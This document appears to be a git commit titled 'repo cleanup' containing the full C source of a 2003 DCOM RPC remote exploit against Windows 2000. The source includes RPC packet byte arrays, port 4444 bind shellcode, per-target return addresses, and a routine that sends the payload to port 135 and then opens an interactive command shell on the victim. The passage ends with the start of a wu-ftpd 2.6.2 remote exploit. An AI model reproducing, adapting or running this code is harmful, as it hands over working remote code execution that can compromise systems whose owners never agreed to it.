Commit 3388c197 authored by Dan Fauxsmith's avatar Dan Fauxsmith
Browse files

repo cleanup

parent 8c67185a
9780596006112
\ No newline at end of file
/*
**
** 2003/07/27 - DCOM RPC WIN32 remote exploit (Most languages)
**
** FlashSky/Benjurry and, H D Moore's code is very excellent.
** It works well even if change only return address.
** I didn't feel necessity for new make.
**
** Thankful to them.
**
** 2003/07/30 - Update, Added magic return address.
**
** kokanin supplied very excellent information:
** URL: http://lists.netsys.com/pipermail/full-disclosure/2003-July/012000.html
**
** * As well as Korean thanks to, a lot of systems can exploit.
**
** --
** Thank you.
**
** P.S: Sorry, for my poor english.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
u_char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,
0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,
0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,
0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
u_char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,
0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,
0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,
0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,
0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,
0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,
0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,
0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,
0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,
0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,
0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,
0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,
0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,
0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,
0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,
0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char request2[]=
{
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
u_char request3[]=
{
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,
0x63,0x00,0x00,0x00
};
u_char request4[]=
{
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,
0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
u_char shellcode[]=
{
/* port 4444 bind shellcode */
0x46,0x00,0x58,0x00,0x4e,0x00,0x42,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x4e,0x00,0x42,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0x46,0x00,0x58,0x00,
0x46,0x00,0x58,0x00,0xff,0xff,0xff,0xff,
0xcc,0xe0,0xfd,0x7f,0xcc,0xe0,0xfd,0x7f,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xeb,
0x19,0x5e,0x31,0xc9,0x81,0xe9,0x89,0xff,
0xff,0xff,0x81,0x36,0x80,0xbf,0x32,0x94,
0x81,0xee,0xfc,0xff,0xff,0xff,0xe2,0xf2,
0xeb,0x05,0xe8,0xe2,0xff,0xff,0xff,0x03,
0x53,0x06,0x1f,0x74,0x57,0x75,0x95,0x80,
0xbf,0xbb,0x92,0x7f,0x89,0x5a,0x1a,0xce,
0xb1,0xde,0x7c,0xe1,0xbe,0x32,0x94,0x09,
0xf9,0x3a,0x6b,0xb6,0xd7,0x9f,0x4d,0x85,
0x71,0xda,0xc6,0x81,0xbf,0x32,0x1d,0xc6,
0xb3,0x5a,0xf8,0xec,0xbf,0x32,0xfc,0xb3,
0x8d,0x1c,0xf0,0xe8,0xc8,0x41,0xa6,0xdf,
0xeb,0xcd,0xc2,0x88,0x36,0x74,0x90,0x7f,
0x89,0x5a,0xe6,0x7e,0x0c,0x24,0x7c,0xad,
0xbe,0x32,0x94,0x09,0xf9,0x22,0x6b,0xb6,
0xd7,0x4c,0x4c,0x62,0xcc,0xda,0x8a,0x81,
0xbf,0x32,0x1d,0xc6,0xab,0xcd,0xe2,0x84,
0xd7,0xf9,0x79,0x7c,0x84,0xda,0x9a,0x81,
0xbf,0x32,0x1d,0xc6,0xa7,0xcd,0xe2,0x84,
0xd7,0xeb,0x9d,0x75,0x12,0xda,0x6a,0x80,
0xbf,0x32,0x1d,0xc6,0xa3,0xcd,0xe2,0x84,
0xd7,0x96,0x8e,0xf0,0x78,0xda,0x7a,0x80,
0xbf,0x32,0x1d,0xc6,0x9f,0xcd,0xe2,0x84,
0xd7,0x96,0x39,0xae,0x56,0xda,0x4a,0x80,
0xbf,0x32,0x1d,0xc6,0x9b,0xcd,0xe2,0x84,
0xd7,0xd7,0xdd,0x06,0xf6,0xda,0x5a,0x80,
0xbf,0x32,0x1d,0xc6,0x97,0xcd,0xe2,0x84,
0xd7,0xd5,0xed,0x46,0xc6,0xda,0x2a,0x80,
0xbf,0x32,0x1d,0xc6,0x93,0x01,0x6b,0x01,
0x53,0xa2,0x95,0x80,0xbf,0x66,0xfc,0x81,
0xbe,0x32,0x94,0x7f,0xe9,0x2a,0xc4,0xd0,
0xef,0x62,0xd4,0xd0,0xff,0x62,0x6b,0xd6,
0xa3,0xb9,0x4c,0xd7,0xe8,0x5a,0x96,0x80,
0xae,0x6e,0x1f,0x4c,0xd5,0x24,0xc5,0xd3,
0x40,0x64,0xb4,0xd7,0xec,0xcd,0xc2,0xa4,
0xe8,0x63,0xc7,0x7f,0xe9,0x1a,0x1f,0x50,
0xd7,0x57,0xec,0xe5,0xbf,0x5a,0xf7,0xed,
0xdb,0x1c,0x1d,0xe6,0x8f,0xb1,0x78,0xd4,
0x32,0x0e,0xb0,0xb3,0x7f,0x01,0x5d,0x03,
0x7e,0x27,0x3f,0x62,0x42,0xf4,0xd0,0xa4,
0xaf,0x76,0x6a,0xc4,0x9b,0x0f,0x1d,0xd4,
0x9b,0x7a,0x1d,0xd4,0x9b,0x7e,0x1d,0xd4,
0x9b,0x62,0x19,0xc4,0x9b,0x22,0xc0,0xd0,
0xee,0x63,0xc5,0xea,0xbe,0x63,0xc5,0x7f,
0xc9,0x02,0xc5,0x7f,0xe9,0x22,0x1f,0x4c,
0xd5,0xcd,0x6b,0xb1,0x40,0x64,0x98,0x0b,
0x77,0x65,0x6b,0xd6,0x93,0xcd,0xc2,0x94,
0xea,0x64,0xf0,0x21,0x8f,0x32,0x94,0x80,
0x3a,0xf2,0xec,0x8c,0x34,0x72,0x98,0x0b,
0xcf,0x2e,0x39,0x0b,0xd7,0x3a,0x7f,0x89,
0x34,0x72,0xa0,0x0b,0x17,0x8a,0x94,0x80,
0xbf,0xb9,0x51,0xde,0xe2,0xf0,0x90,0x80,
0xec,0x67,0xc2,0xd7,0x34,0x5e,0xb0,0x98,
0x34,0x77,0xa8,0x0b,0xeb,0x37,0xec,0x83,
0x6a,0xb9,0xde,0x98,0x34,0x68,0xb4,0x83,
0x62,0xd1,0xa6,0xc9,0x34,0x06,0x1f,0x83,
0x4a,0x01,0x6b,0x7c,0x8c,0xf2,0x38,0xba,
0x7b,0x46,0x93,0x41,0x70,0x3f,0x97,0x78,
0x54,0xc0,0xaf,0xfc,0x9b,0x26,0xe1,0x61,
0x34,0x68,0xb0,0x83,0x62,0x54,0x1f,0x8c,
0xf4,0xb9,0xce,0x9c,0xbc,0xef,0x1f,0x84,
0x34,0x31,0x51,0x6b,0xbd,0x01,0x54,0x0b,
0x6a,0x6d,0xca,0xdd,0xe4,0xf0,0x90,0x80,
0x2f,0xa2,0x04,0x00
};
struct os_plat_pk
{
int op_pk_num;
char *op_pk_str;
u_long retloc_jmp_esp;
};
struct os_plat_pk __pt_pkg_form[]=
{
{0,"Windows 2000 magic version 1",0x0018759F},
{1,"Windows 2000 magic version 2",0x001875E3},
{2,"Windows 2000 magic version 3",0x001F0CD0},
{3,"Windows 2000 magic version 4",0x010016C6},
{4,"Windows 2000 magic version 5",0x010016CB},
{0x82,NULL,0}
};
#define DEF_STR "It's test"
#define DEF_BF (0x1000)
#define DEF_SZ (0xff)
#define GET_SZ (0x400)
int sexsock(char *conn_host_nm,int conn_port_nm);
void start_shell(int st_sock_va);
void re_connt_lm(int st_sock_va);
void pri_usg(char *f_nm);
void pri_banrl();
int main(int argc, char *argv[])
{
int sock,type_def=(0),r_r1,r_r2,whgl;
u_long retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
u_char get_bf[(DEF_BF)],atk_bf[(DEF_BF)];
char def_host[(DEF_SZ)]=(DEF_STR);
(void)pri_banrl();
while((whgl=getopt(argc,argv,"T:t:H:h:Ii"))!=EOF)
{
switch(whgl)
{
case 'T':
case 't':
if((type_def=atoi(optarg))>4)
{
(void)pri_usg(argv[0]);
}
else retloc_jmp_esp=(__pt_pkg_form[type_def].retloc_jmp_esp);
break;
case 'H':
case 'h':
memset((char *)def_host,0,sizeof(def_host));
strncpy(def_host,optarg,sizeof(def_host)-1);
break;
case 'I':
case 'i':
(void)pri_usg(argv[0]);
break;
case '?':
(void)pri_usg(argv[0]);
break;
}
}
if(strstr(def_host,(DEF_STR)))
{
(void)pri_usg(argv[0]);
}
fprintf(stdout," [*] Target: %s.\n",__pt_pkg_form[type_def].op_pk_str);
fprintf(stdout," [0] Add return address.\n");
memcpy((u_char *)shellcode+36,(u_char *)&retloc_jmp_esp,4);
fprintf(stdout," [1] Start, shellcode setting.\n");
memcpy((u_char *)atk_bf,request1,sizeof(request1));
r_r1=sizeof(request1);
r_r2=sizeof(shellcode)/2;
#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l
QIK_SHIFT(request2,0,r_r2);
QIK_SHIFT(request2,8,r_r2);
memcpy((u_char *)atk_bf+r_r1,request2,sizeof(request2));
r_r1+=sizeof(request2);
memcpy((u_char *)atk_bf+r_r1,shellcode,sizeof(shellcode));
r_r1+=sizeof(shellcode);
memcpy((u_char *)atk_bf+r_r1,request3,sizeof(request3));
r_r1+=sizeof(request3);
memcpy((u_char *)atk_bf+r_r1,request4,sizeof(request4));
r_r1+=sizeof(request4);
r_r2=sizeof(shellcode)-12;
QIK_SHIFT(atk_bf,8,r_r2);
QIK_SHIFT(atk_bf,16,r_r2);
QIK_SHIFT(atk_bf,128,r_r2);
QIK_SHIFT(atk_bf,132,r_r2);
QIK_SHIFT(atk_bf,180,r_r2);
QIK_SHIFT(atk_bf,184,r_r2);
QIK_SHIFT(atk_bf,208,r_r2);
QIK_SHIFT(atk_bf,396,r_r2);
fprintf(stdout," [2] Trying %s:135 ...\n",def_host);
sock=(int)sexsock(def_host,(135));
(void)re_connt_lm(sock);
fprintf(stdout," [3] Connected to %s:135.\n",def_host);
send(sock,bindstr,sizeof(bindstr),0);
recv(sock,get_bf,sizeof(get_bf),0);
fprintf(stdout," [4] Send, attack code.\n");
send(sock,atk_bf,r_r1,0);
close(sock);
fprintf(stdout," [5] OK, Trying %s:4444 ...\n",def_host);
fprintf(stdout," [*] Waiting, cmd shell ");
fflush(stdout);
sleep(1);
fprintf(stdout,".");
fflush(stdout);
sleep(1);
fprintf(stdout,".");
fflush(stdout);
sleep(1);
fprintf(stdout,".\n");
sock=(int)sexsock(def_host,(4444));
(void)re_connt_lm(sock);
(void)start_shell(sock);
exit(0);
}
int sexsock(char *conn_host_nm,int conn_port_nm)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;
if((sxp=gethostbyname(conn_host_nm))==NULL)
{
herror(" [-] gethostbyname() error");
return(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror(" [-] socket() error");
return(-1);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(conn_port_nm);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
{
perror(" [-] connect() error");
return(-1);
}
return(sock);
}
void start_shell(int st_sock_va)
{
int died;
char *command="cd C:\\ & echo Wow, are u hacker now ?!\n";
char readbuf[(GET_SZ)];
fd_set rset;
memset((char *)readbuf,0,sizeof(readbuf));
fprintf(stdout," [!] Executed shell successfully !\n\n");
send(st_sock_va,command,strlen(command),0);
for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(st_sock_va,&rset);
FD_SET(STDIN_FILENO,&rset);
select(st_sock_va+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(st_sock_va,&rset))
{
died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
if(died<=0)
exit(0);
readbuf[died]=0;
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>0)
{
readbuf[died]=0;
write(st_sock_va,readbuf,died);
}
}
}
return;
}
void re_connt_lm(int st_sock_va)
{
if(st_sock_va==-1)
{
fprintf(stdout," [-] Failed.\n\n");
fprintf(stdout," Happy Exploit ! :-)\n\n");
exit(-1);
}
}
void pri_usg(char *f_nm)
{
int r_rn=0;
fprintf(stdout," Usage: %s -option [argument]\n\n",f_nm);
fprintf(stdout,"\t -h [hostname] - target host.\n");
fprintf(stdout,"\t -t [number] - select target number.\n\n");
fprintf(stdout," Select target number>\n\n");
for(;;)
{
if(__pt_pkg_form[r_rn].op_pk_num==(0x82))
break;
else
{
fprintf(stdout,"\t {%d} %s\n",__pt_pkg_form[r_rn].op_pk_num,__pt_pkg_form[r_rn].op_pk_str);
}
r_rn++;
}
fprintf(stdout,"\n Exmaple> %s -h korea.microsoft.com -t3\n\n",f_nm);
exit(0);
}
void pri_banrl()
{
fprintf(stdout,"\n DCOM RPC WIN32 remote exploit (Most languages)\n\n");
}
/* eox */
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** Public version - 2003/08/02
**
** --
** This vulnerability was discovered by Wojciech Purczynski <cliph@isec.pl>,
** Janusz Niewiadomski <funkysh@isec.pl>.
** They offered excellent Advisory, I'm thankful to them.
**
** URL: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** More useful version isn't going to share. (various test version)
** For reference, exploit method that use `STOR' command succeeded. :-)
**
** Update: August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** August 3, Brute-Force function addition.
** --
** Thank you.
**
*/
#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"